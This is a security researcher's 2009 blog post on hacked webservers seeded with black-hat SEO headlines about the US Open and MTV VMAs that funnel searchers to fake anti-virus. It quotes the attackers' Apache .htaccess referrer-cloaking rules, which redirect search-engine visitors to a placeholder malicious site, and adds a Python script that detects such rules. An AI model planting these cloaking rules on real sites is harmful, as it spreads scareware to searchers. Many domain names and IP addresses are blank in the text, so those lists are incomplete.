Monday, September 14, 2009

US Open and Video Music Awards top rogue anti-virus efforts

Saturday night I got an email from Brian Tanner, the leader of our UAB Malware Analysis team. Brian plays a bit of tennis, and was doing a search for the "US Open Finals Schedule" in Google, when he noticed some strange links in the top ten results. He wrote me a note to tell me that for some reason "" and "" were both showing up as top sites on Google for his search, but when he tried to follow either link, it took him to a fake anti-virus product instead.

After a little digging Monday morning, and with some helpful pointers from some fellow researchers, it looks like we have a fairly complete story of what's going on here.

On one level, we start with the fact that several webservers have been hacked, and loaded up with extremely powerful Search Engine Optimization terms, what we call "Black SEO" in the community. In this case, the hackers have searched some news sites for their top headlines, and then repeated the search with those headlines as the search terms to pull other related headlines. Then they've created webpages which are loaded with all of those headlines. That's how they are getting into the top searches. By doing some searches with "inurl" and "site" tags on Google, we're able to pull a pretty complete list of the headlines which are being seeded by this Black SEO technique.

For example, here are four sites which are coming up regularly in the searches, with whatever string we are looking for showing up after the question mark in the URL:

Just as an example, I did the Google search:

inurl:look US Open

and received 210 results, including:

Us Open Mens Final 2009
Us Open Final Schedule
Us Open 2009 Mens Final
Us Open Womens Final 2009
Us Open Final 2009
Roger Federer Us Open
Serena Williams Outburst Transcript
Us Open Final
You Tube Serena Wililams
Serena Williams Outburst What Did She Say
Serena Williams Outburst Video

Then I did the same search, without the "US Open" to learn what other headlines this Black SEO technique was trying to capture, and found these headlines:

Tory Shulman
ESPN Boston
Roger Federer US Open
Megan Fox Thumb Pictures
Avaya Nortel
Chicago Bears 2009 schedule
Megan Fox VMA
Beyonce Twitter
VMA Outfits
New Moon Trailer 3 Leaked
Kay Perry Vma Dress
Lil Mama Vma
Kim Clijsters Baby
This is it
Music Awards Taylor Swift
Federer Between the Legs
Beyonce Vma 2009
Defying Gravity Cancelled
Jawbone 2 Review
The Ruins MTV
Bears vs Packers
Lauren London Baby
Lauren London Baby Pictures
Pink Vmas

Students kindly informed me what VMAs are - apparently some people like watching music videos so much they have their own awards show, the Video Music Awards. Most of the top hits in the resulting headlines (more than 1,000 of them) from were either for the VMAs or the US Open.

Some other sites, that we aren't going to dig into as deeply, include:

First, I'd like to acknowledge a pair of great blog articles from the Unmask Parasites Blog:
Unmasking the Antivirus 2009 .htaccess Exploit
Bogus Antivirus 2009 .htaccess Exploit.

The "guts of it" are that the Apache .htaccess includes the following (the destination is a placeholder; flags: NC = case-insensitive match, OR = combine with the next condition, R = external redirect, L = last rule):

# Referrer-based cloaking: redirect only visitors who arrived from a search engine
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://(BadSiteHere) [R,L]

What this means is that if I visit the webpage by accessing it directly, I see the webpage. But if I visit the page after having been referred by a search engine, I get sent to the hacker's page instead.
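Because the cloaking only fires for search-engine referrers, a site owner who checks their own pages by typing the URL will never see it. The following Python script is an added example (not code from the post or from the Unmask Parasites articles) that parses RewriteCond/RewriteRule lines from an .htaccess file, applies Apache's [OR]/[NC] condition semantics, and flags any rule that sends search-engine-referred visitors to an off-site URL. The sample .htaccess embedded in it is constructed from the snippet above with the hypothetical placeholder destination http://bad-site.invalid/ standing in for the hacker's page.

```python
import re
from dataclasses import dataclass

# Constructed sample: the referrer-cloaking .htaccess quoted in the post,
# with a hypothetical placeholder destination (.invalid is a reserved TLD).
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://bad-site.invalid/ [R,L]
"""

SEARCH_ENGINES = ("google", "yahoo", "msn", "bing", "aol", "ask", "altavista")

COND_RE = re.compile(r"^RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)


@dataclass
class Cond:
    variable: str   # e.g. %{HTTP_REFERER}
    pattern: str    # regex (leading '!' negates)
    flags: set


@dataclass
class Rule:
    conds: list     # RewriteCond lines preceding this RewriteRule
    pattern: str
    target: str
    flags: set


def _flags(tok):
    return {f.strip().upper() for f in (tok or "").split(",") if f.strip()}


def parse_htaccess(text):
    """Collect each RewriteRule together with the RewriteConds that guard it."""
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append(Cond(m.group(1), m.group(2), _flags(m.group(3))))
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(Rule(pending, m.group(1), m.group(2), _flags(m.group(3))))
            pending = []  # conditions apply only to the next RewriteRule
    return rules


def conditions_match(conds, env):
    """Apache semantics: conditions AND together, except that a condition
    carrying [OR] is OR-ed with the one that follows it."""
    groups, current = [], []
    for c in conds:
        current.append(c)
        if "OR" not in c.flags:
            groups.append(current)
            current = []
    if current:
        groups.append(current)

    def one(c):
        value = env.get(c.variable.strip("%{}").upper(), "")
        negate = c.pattern.startswith("!")
        pat = c.pattern[1:] if negate else c.pattern
        hit = re.search(pat, value, re.I if "NC" in c.flags else 0) is not None
        return hit != negate

    return all(any(one(c) for c in g) for g in groups)


def simulate(rules, referer, path="/index.html"):
    """Return the redirect target a request would get, or None."""
    env = {"HTTP_REFERER": referer}
    for r in rules:
        if conditions_match(r.conds, env) and re.search(r.pattern, path):
            return r.target
    return None


def find_referrer_cloaking(rules):
    """Flag rules that key on search-engine referrers and redirect off-site."""
    findings = []
    for r in rules:
        engines = sorted({e for c in r.conds
                          if c.variable.upper() == "%{HTTP_REFERER}"
                          for e in SEARCH_ENGINES if e in c.pattern.lower()})
        offsite = r.target.lower().startswith(("http://", "https://"))
        redirect = "R" in r.flags or any(f.startswith("R=") for f in r.flags)
        if engines and offsite and redirect:
            findings.append({"target": r.target, "engines": engines})
    return findings


if __name__ == "__main__":
    rules = parse_htaccess(SAMPLE_HTACCESS)
    for f in find_referrer_cloaking(rules):
        print("referrer cloaking ->", f["target"], "for", ", ".join(f["engines"]))
    print("direct visit:", simulate(rules, ""))
    print("from Google:", simulate(rules, "http://www.google.com/search?q=us+open"))
```

Run it against a copy of a suspect site's .htaccess (paste the file contents in place of SAMPLE_HTACCESS, or read it from disk); a direct visit returns None while a search-engine referrer returns the off-site target, which is exactly the asymmetry the post describes. The same check could be done live with two curl requests differing only in the Referer header, but parsing the file catches the rule even when the redirect target is down.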

Currently the main websites that websearchers are landing on are:


#1. is hosted on the IP addresses and

Some of the live sites also hosted on include:

Several of those domains, including
are also hosted on the IP address,, which also
hosts the following domains:

#2. was hosted on, a Canadian-based address belonging to Velcom, a customer of TATA Communications (AS6453).

That ip is also hosting:

#3 was hosted on, also Velcom.

That IP is also hosting:

#4. was hosted on, an Israeli-based address belonging to "Loads Internet Solutions", a customer of (AS1680). How bold can they be? "Loading" is the term criminals use for the merchandising and monetizing of botnets by using them to download other people's malware. "Loads" are the malware someone else pays you to put on your botnet.

That IP is also hosting:

#5. was also a VELCOM IP address,

That IP address was used to host:

Gee . . . at this point I'm tempted to scan this whole Class C ( and see what other forms of badness reside there . . . Sadly, Velcom's phone number listed in their IP whois data has been disconnected or is not in service. We went ahead and called their upstream, who asked us to send them an email. Hello, Tata Communications! I hope you read this! Thank you for your help!

Here's some I found on IPs through

And here are some nameservers from the same range . . .
